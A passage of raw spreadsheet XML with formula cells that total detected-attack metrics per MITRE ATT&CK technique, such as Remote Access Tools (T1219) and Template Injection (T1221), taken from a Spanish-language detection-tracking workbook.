        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B43,'Tabla 2 - Ataques detec (Imple)'!$AI$3:$AI$112)</f>
        <v>1</v>
      </c>
      <c r="AP43" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B43,'Tabla 2 - Ataques detec (Imple)'!$AH$3:$AH$112)</f>
        <v>2</v>
      </c>
      <c r="AQ43" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B43,'Tabla 2 - Ataques detec (Imple)'!AJ$3:AJ$112)</f>
        <v>0</v>
      </c>
      <c r="AR43" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B43,'Tabla 2 - Ataques detec (Imple)'!AK$3:AK$112)</f>
        <v>0</v>
      </c>
      <c r="AS43" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT43" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B43,'Tabla 2 - Ataques detec (Imple)'!$AL$3:$AL$112)</f>
        <v>0</v>
      </c>
      <c r="AU43" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B43,'Tabla 2 - Ataques detec (Imple)'!$AN$3:$AN$112)</f>
        <v>0</v>
      </c>
      <c r="AV43" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B43,'Tabla 2 - Ataques detec (Imple)'!$AM$3:$AM$112)</f>
        <v>0</v>
      </c>
      <c r="AW43" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B43,'Tabla 2 - Ataques detec (Imple)'!AO$3:AO$112)</f>
        <v>0</v>
      </c>
      <c r="AX43" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B43,'Tabla 2 - Ataques detec (Imple)'!AP$3:AP$112)</f>
        <v>0</v>
      </c>
      <c r="AY43" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ43" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B43,'Tabla 2 - Ataques detec (Imple)'!$AQ$3:$AQ$112)</f>
        <v>0</v>
      </c>
      <c r="BA43" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B43,'Tabla 2 - Ataques detec (Imple)'!$AS$3:$AS$112)</f>
        <v>0</v>
      </c>
      <c r="BB43" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B43,'Tabla 2 - Ataques detec (Imple)'!$AR$3:$AR$112)</f>
        <v>0</v>
      </c>
      <c r="BC43" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B43,'Tabla 2 - Ataques detec (Imple)'!AT$3:AT$112)</f>
        <v>3</v>
      </c>
      <c r="BD43" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B43,'Tabla 2 - Ataques detec (Imple)'!AU$3:AU$112)</f>
        <v>3</v>
      </c>
      <c r="BE43" s="4" t="str">
        <f t="shared" si="8"/>
        <v>3 (3)</v>
      </c>
      <c r="BF43" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B43,'Tabla 2 - Ataques detec (Imple)'!$AV$3:$AV$112)</f>
        <v>3</v>
      </c>
      <c r="BG43" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B43,'Tabla 2 - Ataques detec (Imple)'!$AX$3:$AX$112)</f>
        <v>1</v>
      </c>
      <c r="BH43" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B43,'Tabla 2 - Ataques detec (Imple)'!$AW$3:$AW$112)</f>
        <v>1</v>
      </c>
      <c r="BI43" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B43,'Tabla 2 - Ataques detec (Imple)'!AY$3:AY$112)</f>
        <v>0</v>
      </c>
      <c r="BJ43" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B43,'Tabla 2 - Ataques detec (Imple)'!AZ$3:AZ$112)</f>
        <v>0</v>
      </c>
      <c r="BK43" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="BL43" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B43,'Tabla 2 - Ataques detec (Imple)'!BA$3:BA$112)</f>
        <v>0</v>
      </c>
      <c r="BM43" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B43,'Tabla 2 - Ataques detec (Imple)'!$BC$3:$BC$112)</f>
        <v>0</v>
      </c>
      <c r="BN43" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B43,'Tabla 2 - Ataques detec (Imple)'!$BB$3:$BB$112)</f>
        <v>0</v>
      </c>
      <c r="BO43" s="288">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B43,'Tabla 2 - Ataques detec (Imple)'!BD$3:BD$112)</f>
        <v>2</v>
      </c>
      <c r="BP43" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B43,'Tabla 2 - Ataques detec (Imple)'!BE$3:BE$112)</f>
        <v>2</v>
      </c>
      <c r="BQ43" s="4" t="str">
        <f t="shared" si="10"/>
        <v>2 (2)</v>
      </c>
      <c r="BR43" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B43,'Tabla 2 - Ataques detec (Imple)'!BF$3:BF$112)</f>
        <v>0</v>
      </c>
      <c r="BS43" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B43,'Tabla 2 - Ataques detec (Imple)'!BG$3:BG$112)</f>
        <v>2</v>
      </c>
      <c r="BT43" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B43,'Tabla 2 - Ataques detec (Imple)'!$BI$3:$BI$112)</f>
        <v>1</v>
      </c>
      <c r="BU43" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B43,'Tabla 2 - Ataques detec (Imple)'!$BH$3:$BH$112)</f>
        <v>2</v>
      </c>
      <c r="BV43" s="292">
        <v>1</v>
      </c>
      <c r="BW43" s="322">
        <v>1</v>
      </c>
      <c r="BX43" s="4" t="str">
        <f t="shared" si="11"/>
        <v>1 (1)</v>
      </c>
      <c r="BY43" s="12">
        <v>1</v>
      </c>
      <c r="BZ43" s="13">
        <v>1</v>
      </c>
      <c r="CA43" s="394">
        <v>1</v>
      </c>
      <c r="CB43" s="288">
        <v>2</v>
      </c>
      <c r="CC43" s="4">
        <v>2</v>
      </c>
      <c r="CD43" s="4" t="str">
        <f t="shared" si="12"/>
        <v>2 (2)</v>
      </c>
      <c r="CE43" s="4">
        <v>1</v>
      </c>
      <c r="CF43" s="4">
        <v>1</v>
      </c>
      <c r="CG43" s="13">
        <v>1</v>
      </c>
      <c r="CH43" s="394">
        <v>1</v>
      </c>
    </row>
    <row r="44" spans="1:86" ht="15" customHeight="1">
      <c r="A44" s="4">
        <f t="shared" si="13"/>
        <v>42</v>
      </c>
      <c r="B44" s="4" t="str">
        <f>IFERROR(VLOOKUP(A44,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1219</v>
      </c>
      <c r="C44" s="493" t="str">
        <f>IFERROR(VLOOKUP(B44,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Remote Access Tools</v>
      </c>
      <c r="D44" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B44)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>2</v>
      </c>
      <c r="E44" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B44,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>147</v>
      </c>
      <c r="F44" s="579" t="str">
        <f t="shared" si="14"/>
        <v>2 (147)</v>
      </c>
      <c r="G44" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B44,'Tabla 2 - Ataques detec (Imple)'!F$3:F$112)</f>
        <v>114</v>
      </c>
      <c r="H44" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B44,'Tabla 2 - Ataques detec (Imple)'!G$3:G$112)</f>
        <v>83</v>
      </c>
      <c r="I44" s="322" t="str">
        <f t="shared" si="0"/>
        <v>83 (114)</v>
      </c>
      <c r="J44" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B44,'Tabla 2 - Ataques detec (Imple)'!$H$3:$H$112)</f>
        <v>5</v>
      </c>
      <c r="K44" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B44,'Tabla 2 - Ataques detec (Imple)'!$J$3:$J$112)</f>
        <v>0.5</v>
      </c>
      <c r="L44" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B44,'Tabla 2 - Ataques detec (Imple)'!$I$3:$I$112)</f>
        <v>27</v>
      </c>
      <c r="M44" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B44,'Tabla 2 - Ataques detec (Imple)'!K$3:K$112)</f>
        <v>0</v>
      </c>
      <c r="N44" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B44,'Tabla 2 - Ataques detec (Imple)'!L$3:L$112)</f>
        <v>0</v>
      </c>
      <c r="O44" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P44" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B44,'Tabla 2 - Ataques detec (Imple)'!$M$3:$M$112)</f>
        <v>0</v>
      </c>
      <c r="Q44" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B44,'Tabla 2 - Ataques detec (Imple)'!$O$3:$O$112)</f>
        <v>0</v>
      </c>
      <c r="R44" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B44,'Tabla 2 - Ataques detec (Imple)'!$N$3:$N$112)</f>
        <v>0</v>
      </c>
      <c r="S44" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B44,'Tabla 2 - Ataques detec (Imple)'!P$3:P$112)</f>
        <v>114</v>
      </c>
      <c r="T44" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B44,'Tabla 2 - Ataques detec (Imple)'!Q$3:Q$112)</f>
        <v>83</v>
      </c>
      <c r="U44" s="4" t="str">
        <f t="shared" si="2"/>
        <v>83 (114)</v>
      </c>
      <c r="V44" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B44,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>5</v>
      </c>
      <c r="W44" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B44,'Tabla 2 - Ataques detec (Imple)'!$T$3:$T$112)</f>
        <v>0.5</v>
      </c>
      <c r="X44" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B44,'Tabla 2 - Ataques detec (Imple)'!$S$3:$S$112)</f>
        <v>27</v>
      </c>
      <c r="Y44" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B44,'Tabla 2 - Ataques detec (Imple)'!U$3:U$112)</f>
        <v>159</v>
      </c>
      <c r="Z44" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B44,'Tabla 2 - Ataques detec (Imple)'!V$3:V$112)</f>
        <v>114</v>
      </c>
      <c r="AA44" s="322" t="str">
        <f t="shared" si="3"/>
        <v>114 (159)</v>
      </c>
      <c r="AB44" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B44,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>5</v>
      </c>
      <c r="AC44" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B44,'Tabla 2 - Ataques detec (Imple)'!$Y$3:$Y$112)</f>
        <v>0.5</v>
      </c>
      <c r="AD44" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B44,'Tabla 2 - Ataques detec (Imple)'!$X$3:$X$112)</f>
        <v>50</v>
      </c>
      <c r="AE44" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B44,'Tabla 2 - Ataques detec (Imple)'!Z$3:Z$112)</f>
        <v>36</v>
      </c>
      <c r="AF44" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B44,'Tabla 2 - Ataques detec (Imple)'!AA$3:AA$112)</f>
        <v>36</v>
      </c>
      <c r="AG44" s="322" t="str">
        <f t="shared" si="4"/>
        <v>36 (36)</v>
      </c>
      <c r="AH44" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B44,'Tabla 2 - Ataques detec (Imple)'!$AB$3:$AB$112)</f>
        <v>7</v>
      </c>
      <c r="AI44" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B44,'Tabla 2 - Ataques detec (Imple)'!$AD$3:$AD$112)</f>
        <v>1</v>
      </c>
      <c r="AJ44" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B44,'Tabla 2 - Ataques detec (Imple)'!$AC$3:$AC$112)</f>
        <v>32</v>
      </c>
      <c r="AK44" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B44,'Tabla 2 - Ataques detec (Imple)'!AE$3:AE$112)</f>
        <v>195</v>
      </c>
      <c r="AL44" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B44,'Tabla 2 - Ataques detec (Imple)'!AF$3:AF$112)</f>
        <v>150</v>
      </c>
      <c r="AM44" s="322" t="str">
        <f t="shared" si="5"/>
        <v>150 (195)</v>
      </c>
      <c r="AN44" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B44,'Tabla 2 - Ataques detec (Imple)'!$AG$3:$AG$112)</f>
        <v>17</v>
      </c>
      <c r="AO44" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B44,'Tabla 2 - Ataques detec (Imple)'!$AI$3:$AI$112)</f>
        <v>1</v>
      </c>
      <c r="AP44" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B44,'Tabla 2 - Ataques detec (Imple)'!$AH$3:$AH$112)</f>
        <v>64</v>
      </c>
      <c r="AQ44" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B44,'Tabla 2 - Ataques detec (Imple)'!AJ$3:AJ$112)</f>
        <v>0</v>
      </c>
      <c r="AR44" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B44,'Tabla 2 - Ataques detec (Imple)'!AK$3:AK$112)</f>
        <v>0</v>
      </c>
      <c r="AS44" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT44" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B44,'Tabla 2 - Ataques detec (Imple)'!$AL$3:$AL$112)</f>
        <v>0</v>
      </c>
      <c r="AU44" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B44,'Tabla 2 - Ataques detec (Imple)'!$AN$3:$AN$112)</f>
        <v>0</v>
      </c>
      <c r="AV44" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B44,'Tabla 2 - Ataques detec (Imple)'!$AM$3:$AM$112)</f>
        <v>0</v>
      </c>
      <c r="AW44" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B44,'Tabla 2 - Ataques detec (Imple)'!AO$3:AO$112)</f>
        <v>1</v>
      </c>
      <c r="AX44" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B44,'Tabla 2 - Ataques detec (Imple)'!AP$3:AP$112)</f>
        <v>1</v>
      </c>
      <c r="AY44" s="322" t="str">
        <f t="shared" si="7"/>
        <v>1 (1)</v>
      </c>
      <c r="AZ44" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B44,'Tabla 2 - Ataques detec (Imple)'!$AQ$3:$AQ$112)</f>
        <v>1</v>
      </c>
      <c r="BA44" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B44,'Tabla 2 - Ataques detec (Imple)'!$AS$3:$AS$112)</f>
        <v>0.5</v>
      </c>
      <c r="BB44" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B44,'Tabla 2 - Ataques detec (Imple)'!$AR$3:$AR$112)</f>
        <v>1</v>
      </c>
      <c r="BC44" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B44,'Tabla 2 - Ataques detec (Imple)'!AT$3:AT$112)</f>
        <v>115</v>
      </c>
      <c r="BD44" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B44,'Tabla 2 - Ataques detec (Imple)'!AU$3:AU$112)</f>
        <v>84</v>
      </c>
      <c r="BE44" s="4" t="str">
        <f t="shared" si="8"/>
        <v>84 (115)</v>
      </c>
      <c r="BF44" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B44,'Tabla 2 - Ataques detec (Imple)'!$AV$3:$AV$112)</f>
        <v>6</v>
      </c>
      <c r="BG44" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B44,'Tabla 2 - Ataques detec (Imple)'!$AX$3:$AX$112)</f>
        <v>0.5</v>
      </c>
      <c r="BH44" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B44,'Tabla 2 - Ataques detec (Imple)'!$AW$3:$AW$112)</f>
        <v>28</v>
      </c>
      <c r="BI44" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B44,'Tabla 2 - Ataques detec (Imple)'!AY$3:AY$112)</f>
        <v>34</v>
      </c>
      <c r="BJ44" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B44,'Tabla 2 - Ataques detec (Imple)'!AZ$3:AZ$112)</f>
        <v>33</v>
      </c>
      <c r="BK44" s="322" t="str">
        <f t="shared" si="9"/>
        <v>33 (34)</v>
      </c>
      <c r="BL44" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B44,'Tabla 2 - Ataques detec (Imple)'!BA$3:BA$112)</f>
        <v>2</v>
      </c>
      <c r="BM44" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B44,'Tabla 2 - Ataques detec (Imple)'!$BC$3:$BC$112)</f>
        <v>0.5</v>
      </c>
      <c r="BN44" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B44,'Tabla 2 - Ataques detec (Imple)'!$BB$3:$BB$112)</f>
        <v>32</v>
      </c>
      <c r="BO44" s="288">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B44,'Tabla 2 - Ataques detec (Imple)'!BD$3:BD$112)</f>
        <v>176</v>
      </c>
      <c r="BP44" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B44,'Tabla 2 - Ataques detec (Imple)'!BE$3:BE$112)</f>
        <v>175</v>
      </c>
      <c r="BQ44" s="4" t="str">
        <f t="shared" si="10"/>
        <v>175 (176)</v>
      </c>
      <c r="BR44" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B44,'Tabla 2 - Ataques detec (Imple)'!BF$3:BF$112)</f>
        <v>2</v>
      </c>
      <c r="BS44" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B44,'Tabla 2 - Ataques detec (Imple)'!BG$3:BG$112)</f>
        <v>7</v>
      </c>
      <c r="BT44" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B44,'Tabla 2 - Ataques detec (Imple)'!$BI$3:$BI$112)</f>
        <v>1</v>
      </c>
      <c r="BU44" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B44,'Tabla 2 - Ataques detec (Imple)'!$BH$3:$BH$112)</f>
        <v>146</v>
      </c>
      <c r="BV44" s="292">
        <v>30</v>
      </c>
      <c r="BW44" s="322">
        <v>27</v>
      </c>
      <c r="BX44" s="4" t="str">
        <f t="shared" si="11"/>
        <v>27 (30)</v>
      </c>
      <c r="BY44" s="12">
        <v>4</v>
      </c>
      <c r="BZ44" s="13">
        <v>0.5</v>
      </c>
      <c r="CA44" s="394">
        <v>21</v>
      </c>
      <c r="CB44" s="288">
        <v>60</v>
      </c>
      <c r="CC44" s="4">
        <v>50</v>
      </c>
      <c r="CD44" s="4" t="str">
        <f t="shared" si="12"/>
        <v>50 (60)</v>
      </c>
      <c r="CE44" s="4">
        <v>4</v>
      </c>
      <c r="CF44" s="4">
        <v>2</v>
      </c>
      <c r="CG44" s="13">
        <v>0.5</v>
      </c>
      <c r="CH44" s="394">
        <v>21</v>
      </c>
    </row>
    <row r="45" spans="1:86" ht="15" customHeight="1">
      <c r="A45" s="4">
        <f t="shared" si="13"/>
        <v>43</v>
      </c>
      <c r="B45" s="4" t="str">
        <f>IFERROR(VLOOKUP(A45,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1221</v>
      </c>
      <c r="C45" s="493" t="str">
        <f>IFERROR(VLOOKUP(B45,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Template Injection</v>
      </c>
      <c r="D45" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B45)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E45" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B45,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>16</v>
      </c>
      <c r="F45" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (16)</v>
      </c>
      <c r="G45" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B45,'Tabla 2 - Ataques detec (Imple)'!F$3:F$112)</f>
        <v>1</v>
      </c>
      <c r="H45" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B45,'Tabla 2 - Ataques detec (Imple)'!G$3:G$112)</f>
        <v>1</v>
      </c>
      <c r="I45" s="322" t="str">
        <f t="shared" si="0"/>
        <v>1 (1)</v>
      </c>
      <c r="J45" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B45,'Tabla 2 - Ataques detec (Imple)'!$H$3:$H$112)</f>
        <v>1</v>
      </c>
      <c r="K45" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B45,'Tabla 2 - Ataques detec (Imple)'!$J$3:$J$112)</f>
        <v>1</v>
      </c>
      <c r="L45" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B45,'Tabla 2 - Ataques detec (Imple)'!$I$3:$I$112)</f>
        <v>1</v>
      </c>
      <c r="M45" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B45,'Tabla 2 - Ataques detec (Imple)'!K$3:K$112)</f>
        <v>5</v>
      </c>
      <c r="N45" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B45,'Tabla 2 - Ataques detec (Imple)'!L$3:L$112)</f>
        <v>5</v>
      </c>
      <c r="O45" s="322" t="str">
        <f t="shared" si="1"/>
        <v>5 (5)</v>
      </c>
      <c r="P45" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B45,'Tabla 2 - Ataques detec (Imple)'!$M$3:$M$112)</f>
        <v>5</v>
      </c>
      <c r="Q45" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B45,'Tabla 2 - Ataques detec (Imple)'!$O$3:$O$112)</f>
        <v>1</v>
      </c>
      <c r="R45" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B45,'Tabla 2 - Ataques detec (Imple)'!$N$3:$N$112)</f>
        <v>4</v>
      </c>
      <c r="S45" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B45,'Tabla 2 - Ataques detec (Imple)'!P$3:P$112)</f>
        <v>6</v>
      </c>
      <c r="T45" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B45,'Tabla 2 - Ataques detec (Imple)'!Q$3:Q$112)</f>
        <v>6</v>
      </c>
      <c r="U45" s="4" t="str">
        <f t="shared" si="2"/>
        <v>6 (6)</v>
      </c>
      <c r="V45" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B45,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>6</v>
      </c>
      <c r="W45" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B45,'Tabla 2 - Ataques detec (Imple)'!$T$3:$T$112)</f>
        <v>1</v>
      </c>
      <c r="X45" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B45,'Tabla 2 - Ataques detec (Imple)'!$S$3:$S$112)</f>
        <v>4</v>
      </c>
      <c r="Y45" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B45,'Tabla 2 - Ataques detec (Imple)'!U$3:U$112)</f>
        <v>16</v>
      </c>
      <c r="Z45" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B45,'Tabla 2 - Ataques detec (Imple)'!V$3:V$112)</f>
        <v>11</v>
      </c>
      <c r="AA45" s="322" t="str">
        <f t="shared" si="3"/>
        <v>11 (16)</v>
      </c>
      <c r="AB45" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B45,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>6</v>
      </c>
      <c r="AC45" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B45,'Tabla 2 - Ataques detec (Imple)'!$Y$3:$Y$112)</f>
        <v>1</v>
      </c>
      <c r="AD45" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B45,'Tabla 2 - Ataques detec (Imple)'!$X$3:$X$112)</f>
        <v>9</v>
      </c>
      <c r="AE45" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B45,'Tabla 2 - Ataques detec (Imple)'!Z$3:Z$112)</f>
        <v>21</v>
      </c>
      <c r="AF45" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B45,'Tabla 2 - Ataques detec (Imple)'!AA$3:AA$112)</f>
        <v>15</v>
      </c>
      <c r="AG45" s="322" t="str">
        <f t="shared" si="4"/>
        <v>15 (21)</v>
      </c>
      <c r="AH45" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B45,'Tabla 2 - Ataques detec (Imple)'!$AB$3:$AB$112)</f>
        <v>13</v>
      </c>
      <c r="AI45" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B45,'Tabla 2 - Ataques detec (Imple)'!$AD$3:$AD$112)</f>
        <v>1</v>
      </c>
      <c r="AJ45" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B45,'Tabla 2 - Ataques detec (Imple)'!$AC$3:$AC$112)</f>
        <v>7</v>
      </c>
      <c r="AK45" s="392">
